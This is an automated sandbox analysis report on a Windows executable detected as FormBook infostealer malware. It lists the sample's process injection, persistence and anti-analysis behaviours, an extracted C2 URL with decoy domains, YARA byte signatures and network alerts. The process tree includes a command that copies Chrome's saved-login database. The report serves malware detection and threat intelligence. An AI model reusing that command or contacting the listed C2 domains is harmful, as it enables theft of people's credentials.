Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0426#U0438#U0442#U0430#U0442#U0430.exe

Overview

General Information

Sample name:#U0426#U0438#U0442#U0430#U0442#U0430.exe
renamed because original name is a hash value
Original sample name:.exe
Analysis ID:1447829
MD5:84144b6048277290bb6eb647bbc5ad2a
SHA1:609a26e95e4b343bfb47ab51bdd68ef9a8ef791f
SHA256:151bfa7336a9c96e65bf8a0eeb54a3d34665e612c8c5b3a7886f16a6f58277c4
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Browser Data Stealing
Sigma detected: Use Short Name Path in Command Line
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • #U0426#U0438#U0442#U0430#U0442#U0430.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe" MD5: 84144B6048277290BB6EB647BBC5AD2A)
    • iexplore.exe (PID: 7612 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • mstsc.exe (PID: 7840 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • cmd.exe (PID: 8064 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • firefox.exe (PID: 7748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • iexplore.exe (PID: 7324 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
          • iexplore.exe (PID: 3916 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
            • iexplore.exe (PID: 7196 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
              • ie_to_edge_stub.exe (PID: 7240 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6 MD5: 89CF8972D683795DAB6901BC9456675D)
              • ssvagent.exe (PID: 1060 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
            • ie_to_edge_stub.exe (PID: 7244 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6 MD5: 89CF8972D683795DAB6901BC9456675D)
              • msedge.exe (PID: 7332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6 MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 5780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 6008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
                • identity_helper.exe (PID: 8788 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
                • identity_helper.exe (PID: 8808 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
            • ssvagent.exe (PID: 7520 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
            • iexplore.exe (PID: 8640 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
            • iexplore.exe (PID: 9068 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
        • iexplore.exe (PID: 8588 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
          • iexplore.exe (PID: 8600 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
        • msedge.exe (PID: 7520 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 9064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • WerFault.exe (PID: 7692 cmdline: C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 45 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.iexplore.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.iexplore.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.iexplore.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.iexplore.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.iexplore.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 20 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Internet Explorer\iexplore.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\mstsc.exe, ProcessId: 7840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N2K8UFW
          Sigma detected: Potential Browser Data Stealing
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mstsc.exe", ParentImage: C:\Windows\SysWOW64\mstsc.exe, ParentProcessId: 7840, ParentProcessName: mstsc.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 8064, ProcessName: cmd.exe
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 7196, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 1060, ProcessName: ssvagent.exe
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 3916, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe

          Stealing of Sensitive Information

          barindex
          Sigma detected: Steal Google chrome login data
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mstsc.exe", ParentImage: C:\Windows\SysWOW64\mstsc.exe, ParentProcessId: 7840, ParentProcessName: mstsc.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 8064, ProcessName: cmd.exe

          Snort Signatures

          Timestamp:05/27/24-08:44:12.485707
          SID:2031412
          Source Port:49849
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/27/24-08:45:34.816913
          SID:2031412
          Source Port:49855
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/27/24-08:45:14.403891
          SID:2031412
          Source Port:49853
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/27/24-08:43:11.099341
          SID:2031412
          Source Port:49846
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/27/24-08:44:54.353420
          SID:2031412
          Source Port:49851
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/27/24-08:46:38.965412
          SID:2031412
          Source Port:49860
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/27/24-08:45:55.375437
          SID:2031412
          Source Port:49857
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.venitro.com/gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZRAvira URL Cloud: Label: phishing
          Source: http://www.truedatalab.comAvira URL Cloud: Label: malware
          Source: http://www.amiciperlacoda.com/gy14/www.beautyloungebydede.onlineAvira URL Cloud: Label: phishing
          Source: http://www.mrbmed.com/gy14/Avira URL Cloud: Label: malware
          Source: http://www.ampsportss.com/gy14/Avira URL Cloud: Label: malware
          Source: http://www.venitro.com/gy14/Avira URL Cloud: Label: phishing
          Source: http://www.mtdiyx.xyz/gy14/www.169cc.xyzAvira URL Cloud: Label: phishing
          Found malware configuration
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}
          Multi AV Scanner detection for domain / URL
          Source: www.aicashu.comVirustotal: Detection: 6%Perma Link
          Source: tryscriptify.comVirustotal: Detection: 9%Perma Link
          Source: venitro.comVirustotal: Detection: 8%Perma Link
          Source: www.camelpmkrf.comVirustotal: Detection: 8%Perma Link
          Source: www.6733633.comVirustotal: Detection: 8%Perma Link
          Source: www.mosaica.onlineVirustotal: Detection: 8%Perma Link
          Source: www.169cc.xyzVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for submitted file
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeReversingLabs: Detection: 55%
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeVirustotal: Detection: 59%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.5% probability
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003910C5 CryptProtectData,LocalAlloc,memcpy,LocalFree,6_2_003910C5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039F157 CryptMsgOpenToDecode,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,CertOpenStore,CryptMsgClose,6_2_0039F157
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00391187 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,6_2_00391187
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00391248 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,6_2_00391248
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003912E0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,6_2_003912E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00378511 CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,6_2_00378511
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004176CC CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError,6_2_004176CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039E8E0 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore,6_2_0039E8E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039A940 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,6_2_0039A940
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039AAC0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,6_2_0039AAC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00363C2A memset,CryptUIDlgViewCertificateW,GetLastError,6_2_00363C2A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039DE70 memset,RegOpenKeyExW,RegQueryValueExW,malloc,RegQueryValueExW,wcstombs_s,malloc,wcstombs_s,CryptSignMessage,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain,free,free,RegCloseKey,6_2_0039DE70

          Exploits

          barindex
          Yara detected UAC Bypass using CMSTP
          Source: Yara matchFile source: 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: #U0426#U0438#U0442#U0430#U0442#U0430.exe PID: 7532, type: MEMORYSTR
          Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49788 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49798 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49797 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49816 version: TLS 1.2
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
